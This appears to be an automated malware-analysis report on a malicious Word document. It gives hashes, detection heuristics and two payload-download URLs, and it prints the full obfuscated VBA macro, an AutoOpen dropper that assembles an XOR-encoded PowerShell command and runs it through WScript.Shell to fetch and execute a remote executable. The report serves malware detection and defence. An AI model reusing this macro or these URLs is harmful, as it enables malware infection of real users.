Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5a4b3b42a94ed12f…

MALICIOUS

Office (OLE)

96.8 KB Created: 2018-07-03 09:51:00 Authoring application: Microsoft Office Word First seen: 2018-09-04
MD5: 1ebda23e70a43134ee06e0af8ad82121 SHA-1: cddd6a9738b5374c99c1561f6675fadea6666a57 SHA-256: 5a4b3b42a94ed12f0e46d1dbc142421e4cf61b1b5ada1df3e9231c349c8c6d25
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is triggered upon opening, and it utilizes WScript.Shell and the Shell() function to execute commands. This strongly suggests the macro is designed to download and execute a secondary payload, a common technique for malware delivery.

Heuristics 10

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       DrKPGw = 47106 / uKBzC + 5696 - ojucw / NTOzf + jSbrC
    TZKLGchvGf = jrFPNQEG + CreateObject("Wscript.shell").Run(vMXNz + Chr(vbKeyP) + IbjGdICjF + Chr(vbKeyO) + OmvGcHQK + bcjDtmpLwSi, 541989828 - 541989828)
       PNAoi = 9622 / YHfdSX + 42434 - tCDRiZ / uJHCd + cWESZ
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       DrKPGw = 47106 / uKBzC + 5696 - ojucw / NTOzf + jSbrC
    TZKLGchvGf = jrFPNQEG + CreateObject("Wscript.shell").Run(vMXNz + Chr(vbKeyP) + IbjGdICjF + Chr(vbKeyO) + OmvGcHQK + bcjDtmpLwSi, 541989828 - 541989828)
       PNAoi = 9622 / YHfdSX + 42434 - tCDRiZ / uJHCd + cWESZ
  • Payload URL decoded from an encoded PowerShell loader (2 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "ubwNPjYdFY"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://boyramos.dags.us/license/wait.exe Referenced by macro
    • http://blackcontext.ru/wait.exeReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13091 bytes
SHA-256: 5ca69548c32b8b749d84ec546ab4ac75da43e4dec7b836803ec508491f1a2af4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
267 of 429 identifiers look randomly generated (e.g. 'SmvtrzDDMXHY') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pUiHXGEBpmEah"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ubwNPjYdFY"
Sub AutoOpen()
On Error Resume Next
   TcNzJ = GBhuCQ + iFZKYB + 80113 + 69067 - 70918 * vKhHu
   mhwYM = WczAzI + wDHjo + 84143 + 92188 - 82772 * noMLEQ
   hojub = EFCfm + rALris + 8263 + 72681 - 90017 * iKItMf
   CJKkqA = ilozF + CmTdG + 46750 + 37355 - 65106 * sqQNnG
   wBKjSi = BLUaA + IRIfaI + 33052 + 10890 - 24850 * IzqwS
   fYzVTY = FkMdA + VRBAcC + 27879 + 99929 - 63937 * wWLIt
   MAuGI = YlLzzw + wtofz + 727 + 64489 - 29984 * nDaji
   SmbrL = VtIKiw + nzYDtd + 73131 + 61357 - 12994 * iHNrKN
LiEFzTEwtU (FUKWbFUKjFn + bPzGdPS + tFmMoAKkBBO)
   GMnEot = kWjZX + HuFvL + 28358 + 85586 - 27619 * wObwj
   QCrAZ = nmKQz + wRsaBi + 97375 + 61615 - 46921 * SZNdWw
   wIQiV = LSUOqH + pIbOC + 46760 + 77943 - 77042 * kzcill
   hbjrA = LKVbX + pLMRK + 10161 + 45728 - 15069 * koZiMH
End Sub

Function FUKWbFUKjFn()
On Error Resume Next
CuECzc = (vzzJF - GrVVY - shqqMJ + Elczjt - 69367 + wTCis / tUSdD / iYwbkU)
   WSWKop = (QiNEE - SifTA - mVYzQ + awtKZk - 97005 + sMkXBa / jlwYLH / JnKLi)
   GhEWCD = 14686 - NnSjcV + 67567 * AlZfOo - XAjhwC + PBEOQ / ZiDtMO - GCblQM + 53409 / VqfiSn
   AMzUF = (NsdGFc - OMGzI - ZKDjc + FcDmG - 98990 + GlpjO / SbNBF / qwFtKC)
BcJiIjN = "wershell " + "      " + "    " + "    " + "    &" + Chr(40) + " $p" + "ShomE[21]" + Chr(43) + "$PS" + "hOMe[30]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40)
KkMkh = 31548 / dipRwA + CWliu / ruclY + Ymjjd - 72613 + nbNcaX / jKJauu
   YLqcN = 55075 / SQHaL + rzuuM / PNaotK + OfhkC - 81859 + AAbsHQ / WUKFC
   KIMEst = 97842 / jTAOQ + GJYTm / dwMXMI + QfmBP - 28534 + ZJkPJ / tiJBSP
   ZbOaHz = 77857 / Lvorj + itzRkz / wzZJJ + mwpKFw - 40983 + oQLtSa / NNvXa
zQfCb = " [stRin" + "g]::Joi" + "N" + Chr(40) + "''," + Chr(40) + " " + Chr(40) + " 22,91" + ", 12" + "3 , 10" + "2, 15 " + ",92,87" + " , 6" + "9 , 31 ," + "93, "
kEuUhN = 67158 / QrUPG + PThIw / JqHik + jCwEf - 12756 + MAPQzb / lTEPc
   UwtRB = 32802 / nStwQ + PdfXLL / buFAD + hdlpms - 1987 + zmJfC / qAuGS
   IojPO = 28137 / iEzXw + BOjlj / khPqY + nwWss - 30218 + rwDZvR / nbzvC
   vpOvq = 67997 / zRhszL + bStmM / nEVwok + KSJiU - 77498 + GzhbC / ljZOK
NldvEaVQ = "80, 88 " + ",87 , " + "81,70, " + "18 ,1" + "24 ," + "87, " + "70,28" + ", 101,87" + " ,80 "
JjuKzB = 8522 / oQCii + zIGwFd / MlYpsv + uWlSYt - 6185 + jfzuBV / DRwwKT
   TddTL = 94909 / VVEFLL + ikGok / ZaBLb + ciGst - 70970 + kCIoE / FjNJsp
   NLsFw = 86235 / Prart + SjmBc / EPRSq + sIwXa - 99704 + hCWVlj / tplbXu
   RkiDz = 34529 / OlwtB + EkFrQa / LLwNBV + MPdquv - 11916 + XTTahw / Racjw
PsYfhq = ",113 , 9" + "4,91 , " + "87 ,92" + ", 70 , " + "9 , 22" + ", 88 " + ", 95 ,1" + "02 , 1" + "5,21 ," + "90 , 70 ,"
EPZErf = BazrnT + kIUJKl + 99877 - iIckzz * OzaVz * avakJ * 98182 * juTaj + (59661 + asFSCb * jQbGh / 65496)
   QwhhUF = ABlpDw + YbTwH + 7466 - GpabK * aHpZp * sWNjaB * 60723 * LInNj + (25856 + chNaE * cKIHGK / 90198)
   tLMzc = oKrsv + nzzBNv + 93991 - zZczlz * MFcTq * IRwbND * 18483 * SpUfco + (59709 + GtLNA * TjNOd / 76252)
   JRYhqJ = 51559 / ksbSsC + QPcLU / aQWvBG + nLRIWk - 98229 + KZCjK / AJjWLf
PLrjcVcp = "70,66 " + ", 8, 29," + "29 ,80" + ", 93 ," + " 75 ," + " 64,8" + "3, 9" + "5, 93" + " , 65" + " , 2" + "8 ,86"
ZjnGQ = viwYQF + HdCrlm + 13505 - PVaKd * jFIIh * FrDLK * 85751 * jVNiiG + (64940 + oZEBK * zKONvm / 18451)
   uaVRzu = tsFpaW + rDjSC + 7971 - aMzWd * rLOBIi * lpvVq * 93787 * jKJdaU + (85705 + uNsOi * UOXvU / 14060)
   idEhwR = BHOcFR + PCUvIu + 47422 - BIuzi * bXaWp * zhEviD * 31560 * nzQIN + (53605 + LCzLM * Rcwnw / 67044)
   MARRUS = NtYBm + SopCES + 28449 - VuHTXG * iwdbQX * tBJLM * 47705 * zjQQn + (77368 + aZCPTA * GKzzLQ / 66776)
iENMN = ",83 , " + "85,65 ,28" + " ,71 ,6" + "5 ,29 " + ", 94, 91" + ",81,87," + " 92 , 65," + " 87 ,29 " + ",69, 83 ," + " 91,70, 2" + "8 ,87,7"
OfzXtK = aQwiG + zGYXKz + 28032 - jjjNr * lMQtI * NSESf * 50370 * srNRM + (16965 + QcoLH * aYhzQ / 18265)
   hktSn = Jzids + mzdwfz + 27756 - CZRcXO * uulDo * sTdpFV * 69502 * GdudHF + (16784 + BGMzBO * TQuZF / 29429)
   sZDIu = zGZciz + vXzQJK + 796 - iqrZdL * ZLwic * lUZzK * 55166 * ujkSCT + (23481 + RiQuOL * jMiRU / 78380)
   dpQjl = PZqhs + arCqr + 8416 - BsfDGX * IhozOF * RsXNzU * 17026 * OiXIJ + (2256 + HXVrr * XzmKL / 86667)
iJsBLiSI = "4 , 87" + ",114 ," + " 90 , 70" + ", 70,66 ," + "8, 2" + "9,29 " + ",80 " + ",94,83, " + "81 , 89 ," + "81 ,93, 9" + "2,70 , 87"
DQNRz = wDokr + JWJozM + 95681 - qkPJAN * wWMqJC * XjjKd * 36192 * wFsMf + (63752 + mpicN * aTADRk / 63563)
   VzvwCV = junEB + wDWjpm + 29092 - ajVUI * AiRoU * Andpff * 94987 * nJUKj + (19821 + TJczH * WuQab / 88395)
   KAdzk = iJajB + pDcQM + 20319 - wIhZoo * qisNP * lsAnj * 39665 * bbztcb + (81626 + ztdDP * vwdbpL / 45323)
   nSNzF = AlfBF + jzVRSO + 43456 - iHIYF * nfokFC * YOadO * 24430 * IakbiT + (44711 + EHPlt * XfJpt / 35828)
MnsGLCtzSiw = " , 7" + "4, 70" + ",28, " + "64,7" + "1,29" + " , 69" + ", 83" + " , 9" + "1,70 , 2"
HSDYiD = YRPKPi + IzRidz + 97247 - XwwJF * Uwciwm * chCoS * 59104 * acqwD + (52693 + znDmH * HvHaYw / 84089)
   CdDYTX = szzqUN + DRFVz + 76248 - jRiSq * TfUCzD * DDkEmY * 14027 * szEMZ + (77135 + cmJvC * WLVGc / 66076)
   NdzqQX = zhBiY + AnSdFR + 2028 - DisEA * hsOzJ * cJPBOv * 3197 * LulaW + (43213 + isrBL * XJvFlQ / 9162)
   jcuihz = aHmjiY + fXzUfS + 18978 - iNvZkE * ctslWQ * wdziZM * 64723 * tiFjnd + (12747 + FOqwuj * IPurfs / 81682)
wiLfLSrk = "8 ,87 ,74" + " ,87 , 2" + "1, 2" + "8,97," + "66, 94," + "91,70,26" + ", 21 " + ",114,21" + ", 27 , 9" + ", 22 , "
TkKXdd = FPjqK + kpiWT + 36309 - jMahKQ * QaIWa * FTKUIb * 6792 * IuvRtJ + (34110 + PfGhzD * KdNME / 7962)
   niqfiT = uYtuc + kOQAEO + 62577 - DwAtY * aXAWpW * kfkJOO * 88801 * zZZRt + (53316 + WdlfST * hpmJZf / 43109)
   XEGzA = fqpzmP + WbbfR + 52057 - WlKDX * zvXEpO * aCVLvb * 32225 * mvfjEj + (21123 + KiHEU * luCZA / 71045)
   UnfSr = jQPtLS + ZvFCFi + 95782 - IYspB * jZbPUn * FpLdM * 69283 * hYKbp + (94380 + ACYTTt * MOndpu / 98686)
XJjBKMA = "70, 116" + ",104,1" + "8 ,1" + "5, 18, 2" + "1, 7 ," + "11,1" + "0, 21,9" + " , 22"
wmGlTN = qGbGz + FObZsA + 84237 - CfzJO * QhRmaf * ijUJCN * 83674 * Hffts + (36292 + DJCoZO * HJcFOz / 17244)
   SSdQKu = wOBDGD + LAajW + 44223 - izIAC * JkfSA * mnzlBr * 70970 * jwvCr + (62652 + SzvQj * KnTUPH / 71055)
   MiiCJ = RMPZp + LkfDGJ + 42095 - qnkCUO * zjQmjz * XPNAhP * 95273 * hWavW + (50887 + POGlq * Ywfivp / 34024)
   HNPiFQ = JOrPwY + iQQHG + 39161 - dPthC * ArvOw * dniBPE * 1475 * FROSB + (60538 + jNwFzj * izWwD / 8776)
RlwCKUtnpkd = " , 9" + "3 ,99 , 8" + "8 , 1" + "5, 22 " + ", 87" + " , 92"
FUKWbFUKjFn = BcJiIjN + zQfCb + NldvEaVQ + PsYfhq + PLrjcVcp + iENMN + iJsBLiSI + MnsGLCtzSiw + wiLfLSrk + XJjBKMA + RlwCKUtnpkd
   ojRJXi = PpnAs + ARQVff + 57170 - jlFLm * LhzzrP * qzbiv * 11602 * tMBZWB + (12772 + LjiTff * uLwlC / 91484)
   hKiIB = 63649 / NfXksn * (44971 + YCZWf - DXPvJ / uwQSi) - XEtlbJ - Zzopj
   nZMwu = 46872 / SMinP * (24648 + IhOPEF - QSTma / AGGOh) - vWwhzW - HTKaGV
   soIcbJ = 34371 / mkZjPX * (69408 + pkVTVN - YknmE / kKDBK) - MRtaw - Wwwtw
End Function
Function bPzGdPS()
On Error Resume Next
RNsjY = 70089 / uWGtMT * (15131 + MFPFh - VJzOt / wmFsM) - LzmOX - zHAzro
   fsidH = 82086 / dzJWkr * (28277 + ZmjsoB - cQjUU / FCcfPl) - YooElw - OVdwUN
   ivpKVW = 33220 / SwnWB * (46181 + hrVGTG - wcHsGw / mjzHJ) - GmVuOd - VrQPu
   CmkHFK = 696 / zvEsUf * (49282 + HQOjwH - kwiZI / RWRLb) - YOfAhM - ODiVCK
mnsNvIVzbki = ",68, 8 " + ", 70, 87" + ",95 , " + "66 ," + " 25 ,21" + " ,110 ," + "21 ,25," + "22,70 ,1" + "16 , 104 "
RombO = 86888 / szMDdQ * (35314 + fMoOr - quVarq / PGMszj) - SzIkOh - JaSRwL
   ESZHl = 32562 / JJaYzs * (22896 + aMrdXj - PQTkY / SzzppG) - PuwXc - nPALr
   wMzVP = 71110 / WACInB * (85273 + qMdiKm - ijQTA / soPFb) - bSVbhE - jJMlI
   qfcAC = 50600 / uQAWCi * (57124 + AKfhlq - EDAJOh / DJtfz) - bjruI - XiHOL
cAwwwb = ",25," + " 21,28 ," + " 87, 74" + ", 87,2" + "1,9, 84" + " ,93 ," + " 64,87" + " , 83 , 8" + "1 ,90 " + ", 26"
kKzDX = 54866 / PuiRFw * (70069 + dLnDM - QcVkv / JCsRuH) - QIvlrc - TjkEVk
   QiWGi = 38351 / XkzTYY * (57470 + dEkpL - QnuQI / InHXl) - Hfwwt - XiqaK
   YVOHh = 76974 / kIOzq * (52968 + WvZkcc - JRwJjL / ScNpdl) - mKBFTK - FsfGU
   jGwZh = 92385 / ThbSb * (96375 + MCQWw - UMiZv / SzjrQO) - Kdwur - LswaT
hRBDj = ", 22 " + ",92, 1" + "22, 10" + "0 ,1" + "8, 91," + "92 , 18, " + "22 ," + " 88 ,9"
icJGw = 65081 / OEPzBc * (64409 + fAKNp - jkXfIR / DYSDLH) - pTGrvK - iuEEqd
   KOVsEN = 96058 / bznwB * (35288 + YbtjwA - IUmfiO / mOAws) - MvvvQ - ujhOBv
   fdDXm = 7536 / aGBGYj * (68408 + plmwJJ - cjwQQG / bFkkPi) - iqNuvi - upWhz
   arVsiG = 96947 / lbpQtK * (60720 + tpVkdM - SRfTBp / bRozd) - wKjBwz - fBfRTC
TurLOSGzf = "5 , " + "102 " + ", 27" + " , 73," + "70,64 " + ",75,73," + " 22,91, " + "123,102" + ", 28,118" + ",93,69"
uvbDm = 11859 / AXYVnq * (52588 + vVoTAw - uZDOb / ircjRz) - fihwJ - nLSsHE
   aifVfV = 11857 / Kkbhjr * (5204 + EtXUDN - EjJCP / JFUnF) - jinPH - LzjfBq
   TijXH = 15468 / NTblWT * (81999 + BfGtbb - JRiQt / NbYhSA) - YchNfa - NCBsn
   awTiN = 96652 / oABzX * (59789 + SjwlW - WzQnqK / Iuchw) - UGjXt - SkQic
fzjGt = ",92 " + ", 94" + " ,93 " + ", 83" + ", 86, 116" + ", 91, 9" + "4,87, 26 " + ",22,"
iwEZHP = 50232 / VPtqOn * (99922 + DDESuI - zsOAZ / GPlcJ) - PWzaC - wDNoXR
   ZJoOjK = 24851 / RzvTn * (55282 + QOzMwA - BGjKFk / vFlwNS) - QwdKjD - nMwJi
   aaSFkn = 92182 / hhVEc * (51728 + uJXZJ - zSUBN / YNuiAa) - KVmjL - WiiPH
   CVzzoV = 79898 / ZGhtO * (1237 + OzHNEb - VEdBsw / KJUwO) - nHSzH - qpQSh
IfviwjK = "92,122, " + "100, 30" + " ,18 ,22 " + ",93,99,88" + ", 27,9," + " 97 ,70,8"
bPzGdPS = mnsNvIVzbki + cAwwwb + hRBDj + TurLOSGzf + fzjGt + IfviwjK
   pjzkvQ = 74439 / pLikZP * (69134 + uJFmJQ - iZvrD / dhoVB) - QnqVm - SQJGkS
   HcjsC = 51533 / UUaIwE * (43928 + XunzUd - QAIdL / naRCM) - GVpUrH - FojMn
   jYuaGB = 35540 / OQLAY * (67110 + LitOX - TuDnSM / ALbocz) - ziGhU - wCWfVO
   NEfMVu = (Ndrmo + bYDpWX) + MFdXM + 90006 * 78331 - RXYSEU / (55994 + fOSiwJ)
End Function
Function tFmMoAKkBBO()
On Error Resume Next
PUOpVU = (OrcsM + YAJKI) + bHEJOc + 46648 * 78106 - iLYmi / (32537 + zVidI)
   rUtiH = (whIzpf + bIAbF) + wGSUj + 39226 * 97628 - XaEoaC / (68748 + DSQhTS)
   MMMhpU = (DJFYW + iLLANw) + SjjEGi + 96640 * 40828 - ofiob / (90474 + whmDaB)
   FzPni = (oURjdj + jHaHWt) + UZuiO + 75552 * 36984 - SatFR / (14015 + FruPdL)
Hcobkhv = "3 ,64 , 7" + "0, 31 " + ", 98, 64" + " ,93, 81," + " 87," + " 65, 65 " + ",18, 22,9" + "3, 9" + "9 , 88 " + ", 9," + " 80,64 "
ZMvLX = (DuzKW + EmRXK) + fpFlWS + 51341 * 33894 - CUJIE / (44010 + ApubA)
   OwKuO = (oGfhh + EfFjYv) + ZCqnY + 30080 * 47867 - CjMGP / (83008 + LwYUY)
   VKDYqm = (Fjnll + iBnpdl) + LAaqC + 33938 * 95170 - mbcili / (39034 + iwboGC)
   jXWPo = (MARqu + VjMWYo) + THLCz + 13446 * 27187 - ErBwz / (17850 + uSfCJY)
SbowNOi = ", 87,83," + "89 ,9,79," + " 81,83," + "70 , " + "81,9" + "0, 73, " + "79 , 79 " + Chr(41)
QwzPaV = (zHuiQ + SuwwV) + WbjjT + 72290 * 80618 - UJPwLN / (46691 + SwfBTP)
   bKrrw = (LVbDzj + LUUXIa) + HIQtu + 53817 * 78004 - urWfwt / (62322 + KIJPv)
   jcziaN = (MLoFZ + jRddk) + EnswXC + 88866 * 49348 - BRTrGf / (99766 + WDPRO)
   DJGoRM = (TBRcK + qjZfj) + dLtVNS + 53009 * 62802 - GaVZq / (82283 + mROdNa)
ajaNi = "| fOReA" + "cH{[" + "chAr] " + Chr(40) + " $" + "_-bxO" + "R  0x32 " + Chr(41) + " } " + Chr(41) + Chr(41) + " " + Chr(41) + "   "
tFmMoAKkBBO = Hcobkhv + SbowNOi + ajaNi
   CmwFF = (zZsnhm + pEKcF) + fpHfC + 64791 * 14437 - SszlIz / (8048 + KHPMX)
   QBOwXJ = (zXick + KnsVpf) + NawDUR + 3825 * 87205 - QDaDd / (55360 + zWEXo)
   iXQtQJ = (PptwQJ + vHuXz) + jhtCZm + 31356 * 34685 - CMtjlH / (68155 + IQwvC)
   Fmrqk = (CNrObN + iNTit) + VmhFh + 46657 * 22315 - slGzB / (57147 + nPivfp)
End Function


Attribute VB_Name = "SmvtrzDDMXHY"
Function LiEFzTEwtU(OmvGcHQK)
On Error Resume Next
   YuuoT = 385 / MwTdl + 76179 - WmnuRO / XtQtbY + havNR
   znWkJp = 1168 / TRHtt + 97586 - DFcmcb / Advsb + fXXQUD
   iQClcN = 41389 / cJAia + 79298 - UTboIw / spRONq + trYqXw
   iBZIwZ = 46079 / SSHDY + 64935 - ZdpKi / kkfjZ + qsXEq
   pRbQZC = 4182 / XuHMQ + 76938 - oCswvB / qXwPa + pBTSwG
   lcXGr = 50335 / ASMBjr + 30826 - QivHpb / EUKbOY + apNJb
   MilEU = 36518 / XLufj + 46273 - llWrRl / YDwPM + irWna
   DrKPGw = 47106 / uKBzC + 5696 - ojucw / NTOzf + jSbrC
TZKLGchvGf = jrFPNQEG + CreateObject("Wscript.shell").Run(vMXNz + Chr(vbKeyP) + IbjGdICjF + Chr(vbKeyO) + OmvGcHQK + bcjDtmpLwSi, 541989828 - 541989828)
   PNAoi = 9622 / YHfdSX + 42434 - tCDRiZ / uJHCd + cWESZ
   aQkAo = 33525 / RoIwWQ + 74642 - qdkqWu / Sqhbb + wkbKsA
   QJCOzm = 14367 / mLkmq + 72683 - tTbDcY / tTNpOV + jniQr
   Iilwr = 73931 / MCsZi + 84520 - dkpTWr / wnbpoI + kfoHF
End Function